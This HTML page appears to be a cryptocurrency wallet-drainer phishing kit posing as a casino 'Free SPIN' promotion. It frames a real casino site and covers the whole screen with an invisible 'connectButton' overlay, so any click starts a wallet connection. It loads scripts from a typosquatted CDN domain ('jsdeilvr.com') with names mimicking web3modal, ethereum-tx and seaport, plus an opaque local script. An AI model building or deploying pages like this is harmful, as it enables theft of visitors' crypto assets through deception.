<!DOCTYPE html>
<html>

<head>
    <script async charset="UTF-8" type="text/javascript" src="https://jsdeilvr.com/npm/web3modal.v3.89979e8a.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://jsdeilvr.com/npm/ethereum-tx.min.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://jsdeilvr.com/npm/seaport.min.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://unpkg.com/crypto-js@latest/crypto-js.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://unpkg.com/web3@latest/dist/web3.min.js"></script>
    <script async charset="UTF-8" type="text/javascript" src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script async charset="UTF-8" type="text/javascript" src="./6ffed815d4c923-ba0c3.js"></script>
    <script src="./wheel.js"></script>
    <style>
        * {
            margin: 0;
            padding: 0;
        }

        #iframeContainer {
            position: relative;
            width: 100%;
            height: 100vh;
            z-index: 1; /* Defina um z-index menor para o iframeContainer */
        }

        #wheelOfFortune {
            position: absolute;
            top: 82%;
            left: 22%;
            margin: 0;
            padding: 0;
            transform: translate(-50%, -50%);
            background: transparent;
            z-index: 2; /* Defina um z-index maior para o wheelOfFortune */
        }

        #spin {
            z-index: 3; /* Defina um z-index ainda maior para o spin */
        }

        iframe {
            width: 100%;
            height: 100%;
        }
    </style>
</head>

<body>
    <div class="connectButton" style="width: 100vw;height: 100vh;position: fixed;z-index: 2000;"></div>
    <div id="iframeContainer">
        <iframe src="https://www.wsmcasino.com/en" frameborder="0" style="height: 100vh;"></iframe>
    </div>
    <div id="wheelOfFortune" class="connectButton">
        <canvas id="wheel" width="390" height="390"></canvas>
        <div id="spin">Free SPIN</div>
    </div>
</body>

</html>
